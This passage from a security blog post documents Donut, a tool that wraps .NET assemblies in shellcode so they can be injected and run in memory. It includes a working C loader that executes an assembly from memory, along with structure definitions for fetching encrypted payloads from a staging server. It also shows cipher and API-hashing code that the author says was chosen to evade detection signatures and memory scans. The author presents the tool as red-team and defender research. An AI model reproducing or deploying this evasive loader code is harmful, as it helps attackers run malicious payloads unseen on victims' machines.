    hr = CoCreateInstance(
      CLSID_CorRuntimeHost, 
      NULL, 
      CLSCTX_ALL,
      IID_ICorRuntimeHost, 
      (LPVOID*)&icrh);
      
    if(FAILED(hr)) return;
    
    printf("ICorRuntimeHost::Start()\n");
    hr = icrh->Start();
    if(SUCCEEDED(hr)) {
      printf("ICorRuntimeHost::GetDefaultDomain()\n");
      hr = icrh->GetDefaultDomain(&iu);
      if(SUCCEEDED(hr)) {
        printf("IUnknown::QueryInterface()\n");
        hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
        if(SUCCEEDED(hr)) {
          sab.lLbound   = 0;
          sab.cElements = len;
          printf("SafeArrayCreate()\n");
          sa = SafeArrayCreate(VT_UI1, 1, &sab);
          if(sa != NULL) {
            CopyMemory(sa->pvData, code, len);
            printf("AppDomain::Load_3()\n");
            hr = ad->Load_3(sa, &as);
            if(SUCCEEDED(hr)) {
              printf("Assembly::get_EntryPoint()\n");
              hr = as->get_EntryPoint(&mi);
              if(SUCCEEDED(hr)) {
                v1.vt    = VT_NULL;
                v1.plVal = NULL;
                printf("MethodInfo::Invoke_3()\n");
                hr = mi->Invoke_3(v1, NULL, &v2);
                mi->Release();
              }
              as->Release();
            }
            SafeArrayDestroy(sa);
          }
          ad->Release();
        }
        iu->Release();
      }
      icrh->Stop();
    }
    icrh->Release();
}

int main(int argc, char *argv[])
{
    void *mem;
    struct stat fs;
    FILE *fd;
    
    if(argc != 2) {
      printf("usage: rundotnet <.NET assembly>\n");
      return 0;
    }
    
    // 1. get the size of file
    stat(argv[1], &fs);
    
    if(fs.st_size == 0) {
      printf("file is empty.\n");
      return 0;
    }
    
    // 2. try open assembly
    fd = fopen(argv[1], "rb");
    if(fd == NULL) {
      printf("unable to open \"%s\".\n", argv[1]);
      return 0;
    }
    // 3. allocate memory 
    mem = malloc(fs.st_size);
    if(mem != NULL) {
      // 4. read file into memory
      fread(mem, 1, fs.st_size, fd);
      // 5. run the program from memory
      rundotnet(mem, fs.st_size);
      // 6. free memory
      free(mem);
    }
    // 7. close assembly
    fclose(fd);
    
    return 0;
}

The following is a simple Hello, World! example in C# that when compiled with csc.exe will generate a dot net assembly for testing the loader.

// A Hello World! program in C#.
using System;
namespace HelloWorld
{
    class Hello 
    {
        static void Main() 
        {
            Console.WriteLine("Hello World!");
        }
    }
}

Compiling and running both of these sources gives the following results.

That’s a basic implementation of executing dot net assemblies and doesn’t take into consideration what runtime versions of the framework are supported. The shellcode works differently by resolving the address of CorBindToRuntime and CLRCreateInstance together which is similar to AssemblyLoader by subTee. If CLRCreateInstance is successfully resolved and invocation returns E_NOTIMPL or “Not implemented”, we execute CorBindToRuntime with the pwszVersion parameter set to NULL, which simply requests the latest version available. If we request a specific version from CorBindToRuntime that is not supported by the system, a host process running the shellcode might display an error message. For example, the following screenshot shows a request for v4.0.30319 on a Windows 7 machine that only supports v3.5.30729.5420.

You may be asking why the OLE functions used in the hosting example are not also used in the shellcode. OLE functions are sometimes referenced in another DLL like COMBASE instead of OLE32. xGetProcAddress can handle forward references, but for now at least, the shellcode uses a combination of CorBindToRuntime and CLRCreateInstance. CoCreateInstance may be used in newer versions.

Defining .NET Types

Types are accessible from an unmanaged C++ application using the #import directive. The hosting example uses _AppDomain, _Assembly and _MethodInfo interfaces defined in mscorlib.tlb. The problem, however, is that there’s no definition of the interfaces anywhere in the public version of the Windows SDK. To use a dot net type from lower-level languages like assembly or C, we first have to manually define them. The type information can be enumerated using the LoadTypeLib API which returns a pointer to the ITypeLib interface. This interface will retrieve information about the library while ITypeInfo will retrieve information about the library interfaces, methods and variables. I found the open source application Olewoo useful for examining mscorlib.tlb. If we ignore all the concepts of Object Oriented Programming (OOP) like class, object, inheritance, encapsulation, abstraction, polymorphism..etc, an interface can be viewed from a lower-level as nothing more than a pointer to a data structure containing pointers to functions/methods. I could not find any definition of the required interfaces online except for one file in phplib that partially defines the _AppDomain interface. Based on that example, I created the other interfaces necessary for loading assemblies. The following method is a member of the _AppDomain interface.

        HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
          IType        *This,
          BSTR         name,
          BindingFlags invokeAttr,
          IBinder      *Binder,
          VARIANT      Target,
          SAFEARRAY    *args,
          VARIANT      *pRetVal);

Although no methods of the IBinder interface are used in the shellcode and the type could safely be changed to void *, the following is defined for future reference. The DUMMY_METHOD macro simply defines a function pointer.

    typedef struct _Binder IBinder;

    #undef DUMMY_METHOD
    #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
    
    typedef struct _BinderVtbl {
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
          IBinder * This,
          /* [in] */ REFIID riid,
          /* [iid_is][out] */ void **ppvObject);

        ULONG ( STDMETHODCALLTYPE *AddRef )(
          IBinder * This);

        ULONG ( STDMETHODCALLTYPE *Release )(
          IBinder * This);
          
        DUMMY_METHOD(GetTypeInfoCount);
        DUMMY_METHOD(GetTypeInfo);
        DUMMY_METHOD(GetIDsOfNames);
        DUMMY_METHOD(Invoke);
        DUMMY_METHOD(ToString);
        DUMMY_METHOD(Equals);
        DUMMY_METHOD(GetHashCode);
        DUMMY_METHOD(GetType);
        DUMMY_METHOD(BindToMethod);
        DUMMY_METHOD(BindToField);
        DUMMY_METHOD(SelectMethod);
        DUMMY_METHOD(SelectProperty);
        DUMMY_METHOD(ChangeType);
        DUMMY_METHOD(ReorderArgumentArray);
    } BinderVtbl;
    
    typedef struct _Binder {
      BinderVtbl *lpVtbl;
    } Binder;

Methods required to load assemblies from memory are defined in payload.h.

Donut Instance

The shellcode will always be combined with a block of data referred to as an Instance. This can be considered the “data segment” of the shellcode. It contains the names of DLL to load before attempting to resolve API, 64-bit hashes of API strings, COM GUIDs relevant for loading .NET assemblies into memory and decryption keys for both the Instance, and the Module if one is stored on a staging server. Many shellcodes written in C tend to store strings on the stack, but tools like FireEye Labs Obfuscated String Solver can recover them with relative ease, helping to analyze the code much faster. One advantage of keeping strings in a separate data block is when it comes to the permutation of the code. It’s possible to change the code while retaining the functionality, but never having to work with “read-only” immediate values that would complicate the process and significantly increase the size of the code. The following structure represents what is placed after a call opcode and before a pop ecx / pop rcx. The fastcall convention is used for both x86 and x86-64 shellcodes and this makes it convenient to load a pointer to the Instance in ecx or rcx register.

typedef struct _DONUT_INSTANCE {
    uint32_t    len;                          // total size of instance
    DONUT_CRYPT key;                          // decrypts instance
    // everything from here is encrypted
    
    int         dll_cnt;                      // the number of DLL to load before resolving API
    char        dll_name[DONUT_MAX_DLL][32];  // a list of DLL strings to load
    uint64_t    iv;                           // the 64-bit initial value for maru hash
    int         api_cnt;                      // the 64-bit hashes of API required for instance to work

    union {
      uint64_t  hash[48];                     // holds up to 48 api hashes
      void     *addr[48];                     // holds up to 48 api addresses
      // include prototypes only if header included from payload.h
      #ifdef PAYLOAD_H
      struct {
        // imports from kernel32.dll
        LoadLibraryA_t             LoadLibraryA;
        GetProcAddress_t           GetProcAddress;
        VirtualAlloc_t             VirtualAlloc;             
        VirtualFree_t              VirtualFree;  
        
        // imports from oleaut32.dll
        SafeArrayCreate_t          SafeArrayCreate;          
        SafeArrayCreateVector_t    SafeArrayCreateVector;    
        SafeArrayPutElement_t      SafeArrayPutElement;      
        SafeArrayDestroy_t         SafeArrayDestroy;         
        SysAllocString_t           SysAllocString;           
        SysFreeString_t            SysFreeString;            
        
        // imports from wininet.dll
        InternetCrackUrl_t         InternetCrackUrl;         
        InternetOpen_t             InternetOpen;             
        InternetConnect_t          InternetConnect;          
        InternetSetOption_t        InternetSetOption;        
        InternetReadFile_t         InternetReadFile;         
        InternetCloseHandle_t      InternetCloseHandle;      
        HttpOpenRequest_t          HttpOpenRequest;          
        HttpSendRequest_t          HttpSendRequest;          
        HttpQueryInfo_t            HttpQueryInfo;
        
        // imports from mscoree.dll
        CorBindToRuntime_t         CorBindToRuntime;
        CLRCreateInstance_t        CLRCreateInstance;
      };
      #endif
    } api;
    
    // GUID required to load .NET assembly
    GUID xCLSID_CLRMetaHost;
    GUID xIID_ICLRMetaHost;  
    GUID xIID_ICLRRuntimeInfo;
    GUID xCLSID_CorRuntimeHost;
    GUID xIID_ICorRuntimeHost;
    GUID xIID_AppDomain;
    
    DONUT_INSTANCE_TYPE type;  // PIC or URL 
    
    struct {
      char url[DONUT_MAX_URL];
      char req[16];            // just a buffer for "GET"
    } http;

    uint8_t     sig[DONUT_MAX_NAME];          // string to hash
    uint64_t    mac;                          // to verify decryption ok
    
    DONUT_CRYPT mod_key;       // used to decrypt module
    uint64_t    mod_len;       // total size of module
    
    union {
      PDONUT_MODULE p;         // for URL
      DONUT_MODULE  x;         // for PIC
    } module;
} DONUT_INSTANCE, *PDONUT_INSTANCE;

Donut Module

A dot net assembly is stored in a data structure referred to as a Module. It can be stored with an Instance or on a staging server that the shellcode will retrieve it from. Inside the module will be the assembly, class name, method, and optional parameters. The sig value will contain a random 8-byte string that when processed with the Maru hash function will generate a 64-bit value that should equal the value of mac. This is to verify decryption of the module was successful. The Module key is stored in the Instance embedded with the shellcode.

// everything required for a module goes into the following structure
typedef struct _DONUT_MODULE {
    DWORD   type;                                   // EXE or DLL
    WCHAR   runtime[DONUT_MAX_NAME];                // runtime version
    WCHAR   domain[DONUT_MAX_NAME];                 // domain name to use
    WCHAR   cls[DONUT_MAX_NAME];                    // name of class and optional namespace
    WCHAR   method[DONUT_MAX_NAME];                 // name of method to invoke
    DWORD   param_cnt;                              // number of parameters to method
    WCHAR   param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters passed to method
    CHAR    sig[DONUT_MAX_NAME];                    // random string to verify decryption
    ULONG64 mac;                                    // to verify decryption ok
    DWORD   len;                                    // size of .NET assembly
    BYTE    data[4];                                // .NET assembly file
} DONUT_MODULE, *PDONUT_MODULE;

Random Keys

On Windows, CryptGenRandom generates cryptographically secure random values while on Linux, /dev/urandom is used instead of /dev/random because the latter blocks on read attempts. Thomas Huhn writes in Myths about /dev/urandom that /dev/urandom is the preferred source of cryptographic randomness on Linux. Now, I don’t suggest any of you reuse CreateRandom to generate random keys, but that’s how they’re generated in Donut.

Random Strings

Application Domain names are generated using a random string unless specified by the user generating a payload. If a donut module is stored on a staging server, a random name is generated for that too. The function that handles this is aptly named GenRandomString. Using random bytes from CreateRandom, a string is derived from the letters “HMN34P67R9TWCXYF”. The selection of these letters is based on a post by trepidacious about unambiguous characters.

Symmetric Encryption

An involution is simply a function that is its own inverse and many tools use involutions to obfuscate the code. If you’ve ever reverse engineered malware, you will no doubt be familiar with the eXclusive-OR operation that is used quite a lot because of its simplicity. A more complicated example of involutions can be the non-linear operation used for the Noekeon block cipher. Instead of involutions, Donut uses the Chaskey block cipher in Counter (CTR) mode to encrypt the module with the decryption key embedded in the shellcode. If a Donut module is recovered from a staging server, the only way to get information about what’s inside it is to recover the shellcode, find a weakness with the CreateRandom function or break the Chaskey cipher.

static void chaskey(void *mk, void *p) {
    uint32_t i,*w=p,*k=mk;

    // add 128-bit master key
    for(i=0;i<4;i++) w[i]^=k[i];
    
    // apply 16 rounds of permutation
    for(i=0;i<16;i++) {
      w[0] += w[1],
      w[1]  = ROTR32(w[1], 27) ^ w[0],
      w[2] += w[3],
      w[3]  = ROTR32(w[3], 24) ^ w[2],
      w[2] += w[1],
      w[0]  = ROTR32(w[0], 16) + w[3],
      w[3]  = ROTR32(w[3], 19) ^ w[0],
      w[1]  = ROTR32(w[1], 25) ^ w[2],
      w[2]  = ROTR32(w[2], 16);
    }
    // add 128-bit master key
    for(i=0;i<4;i++) w[i]^=k[i];
}

Chaskey was selected because it’s compact, simple to implement and doesn’t contain constants that would be useful in generating simple detection signatures. The main downside is that Chaskey is relatively unknown and therefore hasn’t received as much cryptanalysis as AES has. When Chaskey was first published in 2014, the recommended number of rounds was 8. In 2015, an attack against 7 of the 8 rounds was discovered showing that the number of rounds was too low of a security margin. In response to this attack, the designers proposed 12 rounds, but Donut uses the Long-term Support (LTS) version with 16 rounds.

API Hashing

If the hash of an API string is well known in advance of a memory scan, detecting Donut would be much easier. It was suggested in Windows API hashing with block ciphers that introducing entropy into the hashing process would help code evade detection for longer. Donut uses the Maru hash function which is built atop of the Speck block cipher. It uses a Davies-Meyer construction and padding similar to what’s used in MD4 and MD5. A 64-bit Initial Value (IV) is generated randomly and used as the plaintext to encrypt while the API string is used as the key.

static uint64_t speck(void *mk, uint64_t p) {
    uint32_t k[4], i, t;
    union {
      uint32_t w[2];
      uint64_t q;
    } x;
    
    // copy 64-bit plaintext to local buffer
    x.q = p;
    
    // copy 128-bit master key to local buffer
    for(i=0;i<4;i++) k[i]=((uint32_t*)mk)[i];
    
    for(i=0;i<27;i++) {
      // donut_encrypt 64-bit plaintext
      x.w[0] = (ROTR32(x.w[0], 8) + x.w[1]) ^ k[0];
      x.w[1] =  ROTR32(x.w[1],29) ^ x.w[0];
      
      // create next 32-bit subkey
      t = k[3];
      k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
      k[0] =  ROTR32(k[0],29) ^ k[3];
      k[1] = k[2]; k[2] = t;
    }
    // return 64-bit ciphertext
    return x.q;
}

Summary

Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully, that is correct. Source code can be found here.

Posted in assembly, encryption, malware, programming, security, shellcode, windows | Tagged , , , , , , | Leave a comment